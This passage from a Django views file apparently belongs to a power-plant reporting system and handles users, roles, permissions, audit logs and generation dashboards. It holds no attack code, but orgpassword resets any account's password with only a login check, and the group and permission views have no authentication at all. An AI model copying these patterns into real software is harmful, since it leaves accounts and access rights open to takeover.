                                userinfo.sort = userinfo.sort + 1
                                userinfo.save()
                            except:
                                pass

                    try:
                        myuserinfo.pnode = puserinfo
                        myuserinfo.sort = sort
                        myuserinfo.save()
                    except:
                        pass
                    if parent != old_parent:
                        return HttpResponse(puserinfo.fullname + "^" + str(puserinfo.id))
                    else:
                        return HttpResponse("0")
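# ---------------------------------------------------------------------------
# Aside: funmove/orgmove above keep each sibling group's `sort` dense (1..n)
# by closing the gap under the old parent and shifting siblings up under the
# new parent. The list analogue of that bookkeeping, as a sketch (names are
# illustrative only):
def move_between(old_siblings, new_siblings, item, position):
    old_siblings.remove(item)            # later old siblings shift down by one
    new_siblings.insert(position, item)  # later new siblings shift up by one
    return old_siblings, new_siblings

# move_between(["a", "b"], ["x", "y"], "b", 0) -> (["a"], ["b", "x", "y"])
# ---------------------------------------------------------------------------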
def orgpassword(request):
    if request.user.is_authenticated():
        if 'id' in request.POST:
            id = request.POST.get('id')
            password1 = request.POST.get('password1')
            password2 = request.POST.get('password2')
            try:
                offset = int(id)
                userinfo = UserInfo.objects.get(id=id)
                user = userinfo.user
                user.set_password(password1)
                user.save()
                return HttpResponse("1")
            except:
                return HttpResponse('修改密码失败,请与管理员联系。')


def group(request, funid):
    if request.user.is_authenticated():
        try:
            allgroup = Group.objects.exclude(state="9")

            return render(request, 'group.html',
                          {'username': request.user.userinfo.fullname,
                           "allgroup": allgroup, "pagefuns": getpagefuns(funid, request)})
        except:
            return HttpResponseRedirect("/index")
    else:
        return HttpResponseRedirect("/login")


def groupsave(request):
    if 'id' in request.POST:
        result = {}
        id = request.POST.get('id', '')
        name = request.POST.get('name', '')
        remark = request.POST.get('remark', '')
        try:
            id = int(id)
        except:
            raise Http404()
        if name.strip() == '':
            result["res"] = '角色名称不能为空。'
        else:
            if id == 0:
                allgroup = Group.objects.filter(name=name).exclude(state="9")
                if (len(allgroup) > 0):
                    result["res"] = name + '已存在。'
                else:
                    groupsave = Group()
                    groupsave.name = name
                    groupsave.remark = remark
                    groupsave.save()
                    result["res"] = "新增成功。"
                    result["data"] = groupsave.id
            else:
                allgroup = Group.objects.filter(
                    name=name).exclude(id=id).exclude(state="9")
                if (len(allgroup) > 0):
                    result["res"] = name + '已存在。'
                else:
                    try:
                        groupsave = Group.objects.get(id=id)
                        groupsave.name = name
                        groupsave.remark = remark
                        groupsave.save()
                        result["res"] = "修改成功。"
                    except:
                        result["res"] = "修改失败。"
        return HttpResponse(json.dumps(result))


def groupdel(request):
    if 'id' in request.POST:
        result = ""
        id = request.POST.get('id', '')
        try:
            id = int(id)
        except:
            raise Http404()
        allgroup = Group.objects.filter(id=id)
        if (len(allgroup) > 0):
            groupsave = allgroup[0]
            groupsave.state = "9"
            groupsave.save()
            result = "删除成功。"
        else:
            result = '角色不存在。'
        return HttpResponse(result)


def getusertree(request):
    if 'id' in request.POST:
        id = request.POST.get('id', '')
        try:
            id = int(id)
        except:
            raise Http404()

        treedata = []
        groupsave = Group.objects.get(id=id)
        selectusers = groupsave.userinfo_set.exclude(state="9")

        rootnodes = UserInfo.objects.order_by("sort").exclude(
            state="9").filter(pnode=None, usertype="org")

        if len(rootnodes) > 0:
            for rootnode in rootnodes:
                root = {}
                root["text"] = rootnode.fullname
                root["id"] = "user_" + str(rootnode.id)
                root["type"] = "org"
                root["state"] = {"opened": True}
                root["children"] = group_get_user_tree(rootnode, selectusers)
                treedata.append(root)
        treedata = json.dumps(treedata)
        return HttpResponse(treedata)


def groupsaveusertree(request):
    if 'id' in request.POST:
        id = request.POST.get('id', '')
        selectedusers = request.POST.get('selecteduser', '')
        selectedusers = selectedusers.split(',')

        try:
            id = int(id)
        except:
            raise Http404()
        groupsave = Group.objects.get(id=id)
        groupsave.userinfo_set.clear()
        if len(selectedusers) > 0:
            for selecteduser in selectedusers:
                try:
                    myuser = UserInfo.objects.get(
                        id=int(selecteduser.replace("user_", "")))
                    if myuser.usertype 
== \"user\":\n myuser.group.add(groupsave)\n except:\n pass\n return HttpResponse(\"保存成功。\")\n\n\ndef getfuntree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n\n treedata = []\n groupsave = Group.objects.get(id=id)\n selectfuns = groupsave.fun.exclude(state=\"9\")\n\n rootnodes = Fun.objects.order_by(\n \"sort\").filter(pnode=None, funtype=\"node\")\n\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = {}\n root[\"text\"] = rootnode.name\n root[\"id\"] = \"fun_\" + str(rootnode.id)\n root[\"type\"] = \"node\"\n root[\"state\"] = {\"opened\": True}\n root[\"children\"] = group_get_fun_tree(rootnode, selectfuns)\n treedata.append(root)\n treedata = json.dumps(treedata)\n return HttpResponse(treedata)\n\n\ndef groupsavefuntree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n selectedfuns = request.POST.get('selectedfun', '')\n selectedfuns = selectedfuns.split(',')\n\n try:\n id = int(id)\n except:\n raise Http404()\n groupsave = Group.objects.get(id=id)\n groupsave.fun.clear()\n if len(selectedfuns) > 0:\n for selectedfun in selectedfuns:\n try:\n myfun = Fun.objects.get(\n id=int(selectedfun.replace(\"fun_\", \"\")))\n if myfun.funtype == \"fun\":\n groupsave.fun.add(myfun)\n except:\n pass\n return HttpResponse(\"保存成功。\")\n\n\ndef get_format_date(pre_date, c_cycletype, type=\"C\"):\n \"\"\"格式化日期\n\n Args:\n pre_date (datetime): 格式化前日期\n cycletype (int): 周期类型\n type (string): 响应类型:C中文 E英文\n\n Returns:\n [datetime]: [格式化后日期]\n \"\"\"\n format_date = \"\"\n try:\n if type == \"C\":\n if c_cycletype == \"10\":\n format_date = pre_date.strftime('%Y{y}%m{m}%d{d}').format(y='年', m='月', d='日')\n if c_cycletype == \"11\":\n format_date = pre_date.strftime('%Y{y}%m{m}').format(y='年', m='月')\n if c_cycletype == \"12\":\n format_date = pre_date.strftime('%Y{y} {q}').format(y='年', q='第{0}季度'.format(\n (pre_date.month - 1) // 3 + 1))\n if c_cycletype == \"13\":\n if pre_date.month <= 6:\n p = \"上\"\n else:\n p = \"下\"\n format_date = pre_date.strftime('%Y{y} {p}').format(y='年', p='{0}半年'.format(p))\n if c_cycletype == \"14\":\n format_date = pre_date.strftime('%Y{y}').format(y='年')\n else:\n if c_cycletype in [\"10\", \"12\", \"13\"]: # 日 季 半年\n format_date = \"{:%Y-%m-%d}\".format(pre_date)\n if c_cycletype == \"11\": # 月\n format_date = \"{:%Y-%m}\".format(pre_date)\n if c_cycletype == \"14\": # 年\n format_date = \"{:%Y}\".format(pre_date)\n except Exception as e:\n print(e)\n\n return format_date\n\n\ndef get_reporting_log(request):\n if request.user.is_authenticated():\n reporting_log = ReportingLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work')\n reporting_type_dict = {\n 'del': '删除',\n 'release': '发布',\n 'save': '保存',\n 'cancelrelease': '取消发布'\n }\n\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for num, rl in enumerate(reporting_log):\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n reporting_type = ''\n try:\n reporting_type = reporting_type_dict[rl.type]\n except:\n pass\n time = ''\n try:\n time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n\n # 报表时间 \n datadate = rl.datadate\n\n # 日报 月报 季报 半年报 年报\n # 2020年01月01日 日报\n # 2020年01月 月报\n # 2020年 第1季度 季报\n # 2020年 上半年/下半年 半年报\n # 
2020年 年报\n\n datadate = get_format_date(datadate, rl.cycletype)\n user = '{0}'.format(user)\n datadate = '{0}'.format(datadate)\n app = '{0}'.format(app)\n work = '{0}'.format(work)\n operationtype = '{0}'.format(map_operation(rl.operationtype, True)) if rl.operationtype else \"\"\n log = '{user}{reporting_type}{app}{work}{datadate}{cycletype}报{operationtype}数据。'.format(**{\n 'user': user,\n 'app': app,\n 'work': work if work else '',\n 'reporting_type': reporting_type,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate\n })\n # 黄展翔 发布 动力中心经营统计计划部填报 2020-01-02日报数据\n reporting_log_list.append({\n 'time': time,\n 'log': log\n })\n if num > 50:\n break\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef reporting_log_index(request, funid):\n if request.user.is_authenticated():\n start_time = (datetime.datetime.now() - datetime.timedelta(days=30)).strftime(\"%Y-%m-%d\")\n end_time = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n return render(request, 'reporting_log.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request),\n \"start_time\": start_time,\n \"end_time\": end_time,\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef reporting_log_data(request):\n if request.user.is_authenticated():\n start_time = request.GET.get('start_time', '')\n end_time = request.GET.get('end_time', '')\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m-%d\") + datetime.timedelta(days=1)\n reporting_log = ReportingLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work')\\\n .filter(write_time__range=[start_time, end_time])\n reporting_type_dict = {\n 'del': '删除',\n 'release': '发布',\n 'save': '保存',\n 'cancelrelease': '取消发布'\n }\n\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for rl in reporting_log:\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n reporting_type = ''\n try:\n reporting_type = reporting_type_dict[rl.type]\n except:\n pass\n write_time = ''\n try:\n write_time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n\n # 报表时间\n datadate = rl.datadate\n\n datadate = get_format_date(datadate, rl.cycletype)\n user_no_color = user\n user = '{0}'.format(user)\n datadate = '{0}'.format(datadate)\n app = '{0}'.format(app)\n work = '{0}'.format(work)\n operationtype = '{0}'.format(map_operation(rl.operationtype, True)) if rl.operationtype else \"\"\n log = '{user}{reporting_type}{app}{work}{datadate}{cycletype}报{operationtype}数据。'.format(**{\n 'user': user,\n 'app': app,\n 'work': work if work else '',\n 'reporting_type': reporting_type,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate\n })\n reporting_log_list.append({\n 'write_time': write_time,\n 'log': log,\n 'user': user_no_color,\n 'id': rl.id\n\n })\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\n# 更新数据记录\ndef update_data_log_index(request, funid):\n if request.user.is_authenticated():\n start_time = (datetime.datetime.now() - datetime.timedelta(days=365)).strftime(\"%Y-%m\")\n end_time = datetime.datetime.now().strftime(\"%Y-%m\")\n\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n 
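# ---------------------------------------------------------------------------
# Aside: get_format_date above avoids putting CJK literals directly inside a
# strftime pattern (which can misbehave on some platforms/encodings) by
# emitting `{y}`-style placeholders and substituting them afterwards. Expected
# behaviour, sketched as a commented demo (values assumed, mirroring the
# "10"/"11"/"14" branches above):
#
#     d = datetime.datetime(2020, 1, 2)
#     d.strftime('%Y{y}%m{m}%d{d}').format(y='年', m='月', d='日')  # '2020年01月02日'
#     d.strftime('%Y{y}%m{m}').format(y='年', m='月')                # '2020年01月'
#     d.strftime('%Y{y}').format(y='年')                             # '2020年'
# ---------------------------------------------------------------------------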
adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n return render(request, 'update_data_log.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid, request),\n \"start_time\": start_time,\n \"end_time\": end_time,\n \"adminapp\": adminapp.id if adminapp else '',\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef update_data_log_data(request):\n if request.user.is_authenticated():\n adminapp = request.GET.get('adminapp', '')\n start_time = request.GET.get('start_time', '')\n end_time = request.GET.get('end_time', '')\n\n start_time = datetime.datetime.strptime(start_time, \"%Y-%m\")\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m\") + datetime.timedelta(days=30)\n try:\n adminapp = int(adminapp)\n except:\n pass\n update_data_log = UpdateDataLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work', 'target')\\\n .filter(write_time__range=[start_time, end_time],adminapp_id=adminapp)\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for rl in update_data_log:\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n target_name = rl.target.name if rl.target else ''\n before_curvalue = round(rl.before_curvalue, rl.target.digit)\n after_curvalue = round(rl.after_curvalue, rl.target.digit)\n datadate = get_format_date(rl.datadate, rl.cycletype)\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n write_time = ''\n try:\n write_time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n operationtype = map_operation(rl.operationtype, True) if rl.operationtype else \"\"\n reporting_log_list.append({\n 'id': rl.id,\n 'target_name': target_name,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate,\n 'write_time': write_time,\n 'user': user,\n 'app': app,\n 'work': work,\n 'before_curvalue': before_curvalue,\n 'after_curvalue': after_curvalue,\n })\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_month_fdl(request):\n \"\"\"\n 一个月内 新厂、动力中心、老厂 所有机组:全场 分机组 的发电量曲线\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n def get_target_30days_value_queryset(date, target):\n \"\"\"\n 处理隔年问题\n :param date:\n :param target:\n :return:\n \"\"\"\n target_30days_values = []\n operation_type = target.operationtype\n date_year = date.year\n target_values = []\n if operation_type == \"1\":\n target_values = getmodels(\"Meterdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\", \"datadate\")\n if operation_type == \"15\":\n target_values = getmodels(\"Entrydata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\", \"datadate\")\n if operation_type == \"16\":\n target_values = getmodels(\"Extractdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\",\n \"datadate\")\n if operation_type == \"17\":\n target_values = getmodels(\"Calculatedata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\",\n \"datadate\")\n\n for i in range(1, 31):\n # 并非同一年,重新取数\n if date.year != date_year:\n if operation_type == \"1\":\n 
                        target_values = getmodels("Meterdata", str(date.year)).objects.exclude(state="9").filter(target__cycletype=10).filter(target=target).values(
                            "curvalue", "datadate"
                        )
                    if operation_type == "15":
                        target_values = getmodels("Entrydata", str(date.year)).objects.exclude(state="9").filter(target__cycletype=10).filter(target=target).values(
                            "curvalue", "datadate"
                        )
                    if operation_type == "16":
                        target_values = getmodels("Extractdata", str(date.year)).objects.exclude(state="9").filter(target__cycletype=10).filter(target=target).values(
                            "curvalue", "datadate"
                        )
                    if operation_type == "17":
                        target_values = getmodels("Calculatedata", str(date.year)).objects.exclude(state="9").filter(target__cycletype=10).filter(target=target).values(
                            "curvalue", "datadate"
                        )
                target_value = 0
                for tv in target_values:
                    if "{0:%Y-%m-%d}".format(tv["datadate"]) == "{0:%Y-%m-%d}".format(date):
                        target_value = float(tv["curvalue"]) if tv["curvalue"] else 0
                        break
                target_30days_values.append(target_value)
                date -= datetime.timedelta(days=1)

            return target_30days_values

        def get_categories(date):
            categories = []
            for i in range(1, 31):
                categories.append("{0:%Y-%m-%d}".format(date))
                date -= datetime.timedelta(days=1)

            return categories

        # old plant business statistics:
        # FD_11_01 (meter reading)  FD_12_01 (meter reading)  FDL_9F (calculated)
        # power center business statistics:
        # DLZX_JYTJ_01_FDL (calculated)  DLZX_JYTJ_02_FDL (calculated)  DLZX_JYTJ_FDL (calculated)
        # new plant business statistics:
        # NEW_JYTJ_01_FDL  NEW_JYTJ_02_FDL  NEW_JYTJ_FDL
        today = datetime.datetime.now()
        # today = datetime.datetime.strptime("2020-01-31", "%Y-%m-%d")

        dlzx_fdl_code_list = ["DLZX_JYTJ_01_FDL", "DLZX_JYTJ_02_FDL", "DLZX_JYTJ_FDL"]
        lc_fdl_code_list = ["FD_11_01", "FD_12_01", "FDL_9F"]
        xc_fdl_code_list = ["NEW_JYTJ_01_FDL", "NEW_JYTJ_02_FDL", "NEW_JYTJ_FDL"]
        colors = ["#3598dc", "#e7505a", "#32c5d2", "#67809F", "#f3c200"]

        dlzx = []
        lc = []
        xc = []

        for num, fdl_code in enumerate(dlzx_fdl_code_list):
            targets = Target.objects.exclude(state="9").filter(code=fdl_code)
            if targets.exists():
                target = targets[0]
                target_30days_values = get_target_30days_value_queryset(today, target)
                color = "#3598dc"
                try:
                    color = colors[num]
                except Exception:
                    pass

                dlzx.append({
                    "name": target.name,
                    "color": color,
                    "fdl": target_30days_values
                })
        for num, fdl_code in enumerate(lc_fdl_code_list):
            targets = Target.objects.exclude(state="9").filter(code=fdl_code)
            if targets.exists():
                target = targets[0]
                target_30days_values = get_target_30days_value_queryset(today, target)
                color = "#3598dc"
                try:
                    color = colors[num]
                except Exception:
                    pass

                lc.append({
                    "name": target.name,
                    "color": color,
                    "fdl": target_30days_values
                })
        for num, fdl_code in enumerate(xc_fdl_code_list):
            targets = Target.objects.exclude(state="9").filter(code=fdl_code)
            if targets.exists():
                target = targets[0]
                target_30days_values = get_target_30days_value_queryset(today, target)
                color = "#3598dc"
                try:
                    color = colors[num]
                except Exception:
                    pass

                xc.append({
                    "name": target.name,
                    "color": color,
                    "fdl": target_30days_values
                })

        categories = get_categories(today)
        return JsonResponse({
            "DLZX_JYTJ": {
                "fld_list": dlzx,
                "categories": categories
            },
            "LC_JYTJ": {
                "fld_list": lc,
                "categories": categories
            },
            "XC_JYTJ": {
                "fld_list": xc,
                "categories": categories
            }
        })
    else:
        return HttpResponseRedirect("/login")


def 
get_target_data_recently(code):\n \"\"\"\n 获取指标 最近有数据的一天的数据\n :param code:\n :return appointed_time_object:\n \"\"\"\n data = {\n \"target_name\": \"\",\n \"unit\": \"\",\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n targets = Target.objects.exclude(state=\"9\").filter(code=code)\n if targets.exists():\n target = targets[0]\n operation_type = target.operationtype\n digit = target.digit\n\n data[\"unit\"] = target.unity\n data[\"target_name\"] = target.name\n\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n # 操作类型: 计算、提取、录入、电表走字\n now_time = datetime.datetime.now()\n for i in range(1, 3): # 2年内\n recent_object = getmodels(model_name, str(now_time.year)).objects.exclude(state=\"9\").filter(\n target=target\n ).last()\n if recent_object:\n curvalue = 0\n cumulativemonth = 0\n cumulativeyear = 0\n\n try:\n curvalue = float(round(recent_object.curvalue, digit))\n except Exception:\n pass\n try:\n cumulativemonth = float(round(recent_object.cumulativemonth, digit))\n except Exception:\n pass\n try:\n cumulativeyear = float(round(recent_object.cumulativeyear, digit))\n except Exception:\n pass\n\n data[\"curvalue\"] = curvalue\n data[\"cumulativemonth\"] = cumulativemonth\n data[\"cumulativeyear\"] = cumulativeyear\n break\n now_time = now_time - datetime.timedelta(days=1)\n else:\n data[\"curvalue\"] = 0\n data[\"cumulativemonth\"] = 0\n data[\"cumulativeyear\"] = 0\n\n return data\n\n\ndef get_appointed_time_data(code, appointed_time):\n \"\"\"\n 获取指标指定时间的数据对象\n :param code:\n :param appointed_time:\n :return appointed_time_object:\n \"\"\"\n data = {\n \"target_name\": \"\",\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n targets = Target.objects.exclude(state=\"9\").filter(code=code)\n if targets.exists():\n target = targets[0]\n operation_type = target.operationtype\n digit = target.digit\n appointed_time_object = []\n\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n # 操作类型: 计算、提取、录入、电表走字\n appointed_time_object = getmodels(model_name, str(appointed_time.year)).objects.exclude(state=\"9\").filter(\n datadate=appointed_time.date()\n ).filter(target=target)\n\n if appointed_time_object:\n appointed_time_object = appointed_time_object[0]\n\n curvalue = 0\n cumulativemonth = 0\n cumulativeyear = 0\n\n try:\n curvalue = float(round(appointed_time_object.curvalue, digit))\n except Exception:\n pass\n try:\n cumulativemonth = float(round(appointed_time_object.cumulativemonth, digit))\n except Exception:\n pass\n try:\n cumulativeyear = float(round(appointed_time_object.cumulativeyear, digit))\n except Exception:\n pass\n data = {\n \"target_name\": target.name,\n \"curvalue\": curvalue,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativeyear\": cumulativeyear\n }\n else:\n data = {\n \"target_name\": target.name,\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n return data\n\n\ndef get_important_targets(request):\n \"\"\"\n 获取燃热、煤机、9F重要指标 最近有数据的一天\n 煤机:发电量、上网电量、供热量、耗煤量、负荷率、厂用电率、发电标煤耗、供电标煤耗、供热标煤耗\n 燃热:发电量、上网电量、供热量、负荷率、厂用电率、发电标煤耗、供电标煤耗、供热标煤耗 -> 没有耗煤量\n 9F:发电量、上网电量、耗气量、负荷率、厂用电率、发电标煤耗、供电标煤耗\n 发电量月计划、上网电量月计划\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n data 
= {\n \"RR\": {\n \"JYZB\": [\n {\"target\": \"DLZX_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_ZGRL_NEW\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_FHL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_ZHCYDL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_FDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_GDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_GRBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"HBZB\": [\n {\"target\": \"DLZX_HB_01_RJPFND_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJPFND_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJPFND_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJPFND_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_NOx\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"DLZX_JYTJ_FDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"DLZX_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"DLZX_JYTJ_SWDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"DLZX_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n \"MJ\": {\n \"JYZB\": [\n {\"target\": \"NEW_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GRL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_HML\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_FHL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_ZHCYDL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_FDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GRBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"HBZB\": [\n {\"target\": \"NEW_HB_01_SO2ZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_SO2ZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_SO2PFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_SO2PFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YCZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YCZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YCPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YCPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_NOXZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_NOXZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": 
\"NEW_HB_02_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"NEW_JYTJ_FDLNJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"NEW_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"NEW_JYTJ_SWDLNJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"NEW_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n \"9F\": {\n \"JYZB\": [\n {\"target\": \"FDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"SWDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"FDHQ\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"FHL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"ZHCYDL_9F_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"FDBZMHLV_9F_NLJ\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"ZHGDBZMHL_9F_Y\", \"v_type\": \"curvalue\", \"value\": 0,\n }],\n \"HBZB\": [\n {\"target\": \"OLD_HB_11_NOXPJSCND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPJSCND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_NOXPJZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPJZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"9F_FDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"FDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"9F_SWDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"SWDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n }\n\n # **************\n # 燃热\n # **************\n # 